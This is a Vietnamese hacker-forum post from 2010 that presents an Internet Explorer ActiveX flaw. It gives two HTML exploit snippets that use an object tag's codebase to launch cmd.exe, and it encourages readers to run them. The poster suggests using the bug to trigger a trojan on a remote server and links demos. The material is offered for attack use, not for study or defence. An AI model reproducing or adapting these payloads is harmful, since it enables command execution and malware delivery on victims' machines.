Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

 

 Một lỗi của IE liên quan đến ActiveX :

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Một lỗi của IE liên quan đến ActiveX : Empty
Bài gửiTiêu đề: Một lỗi của IE liên quan đến ActiveX :   Một lỗi của IE liên quan đến ActiveX : EmptySat Oct 23, 2010 5:50 pm

Các bạn save và chạy đoạn html sau:
<html>
<body>
<span id="oSpan"></span>
<script language="javascript">
oSpan.innerHTML="<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/cmd.exe?/c+dir "></object>";
</script>
</body>
</html>
hoặc
<html>
<body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/cmd.exe?/c+dir"></object>
]]>
</exploit>
</security>
</xml>
</body>
</html>
Tuy nó có hạn chế là ko chạy được thêm các parameters truyền vào, nhưng các bạn thử xem có thể lợi dụng lỗi này để làm được nhiều việc rất có ích, như kích hoạt trojan ở remote server chẳng hạn.
Thử demo ở đây hoặc đây

Về Đầu Trang Go down
 
Một lỗi của IE liên quan đến ActiveX :
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Quản trị mạng WindowsNT (Phần 2 ):
» Quản trị mạng WindowsNT (phần 3):
» Quản trị mạng WindowsNT (phần 1)

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến